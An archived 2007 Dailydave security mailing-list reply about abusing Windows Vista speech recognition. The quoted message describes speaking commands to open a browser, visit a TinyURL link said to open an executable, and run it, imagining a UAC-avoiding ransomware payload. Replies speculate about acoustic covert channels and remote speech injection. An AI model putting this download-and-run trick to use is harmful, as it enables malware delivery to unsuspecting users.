|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Dailydave] Vista speach recognition
From: Curt Wilson (curtw
siu.edu)
Date: Wed Jan 31 2007 - 11:16:01 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I've not analyzed this issue but I wonder what it might take to feed
some remotely hosted speech directly to the system as user-level
commands, bypassing the need for the sound to emerge from speakers and
be picked up by a microphone. I'd guess that higher access than a
generic user would be required for such a trick to work, such as hooking
the voice input routines (if attacker/pentester can do this, why bother
with the clumsiness of such an attack), if it would work at all.
dangeer.org wrote:
> "George Ou" writes:
> -+-----------------
> | I just verified that TinyURL.com will give you a nice URL to an executable.
> |
> | Here's an example of a URL that opens a .EXE file.
> | http://tinyurl.com/3d588b
> |
> | Now imagine that this was actually a user-mode malicious payload that avoids
> | triggering UAC which contains ransomware. It's very easy to use Vista
> | speech command open IE7 and say "tinyURL.com/3d588b", "enter", "run". That
> | will actually download and launch your desired payload from any website and
> | TinyURL will make it easy to say. This is actually easier than my
> | successful document-deleting recycle bin emptying test because it's a
> | shorter script.
> |
>
> Spectacular!
>
> So, for two or more machines that can hear each other,
> I can make one of them tell another to do something
> naughty or perhaps I can even use the air itself as
> a not-very-covert-but-you-know-what-I-mean channel
> for moving data. Plausible deniability never had it
> so good.
>
> --dan
>
> ==========
> The Oracle:
> Of course you have. Every time you've heard someone say
> they saw a ghost, or an angel. Every story you've ever
> heard about vampires, werewolves, or aliens is the
> system assimilating some program that's doing something
> they're not supposed to be doing.
> Neo:
> Programs hacking programs...
>
> _______________________________________________
> Dailydave mailing list
> Dailydavelists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>
--
Curt Wilson
IT Network Security Officer
Southern Illinois University Carbondale
618-453-6237
GnuPG key: http://www.infotech.siu.edu/security/curtw.pub.asc
_______________________________________________
Dailydave mailing list
Dailydavelists.immunitysec.com
http://lists.immunitysec.com/mailman/listinfo/dailydave
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]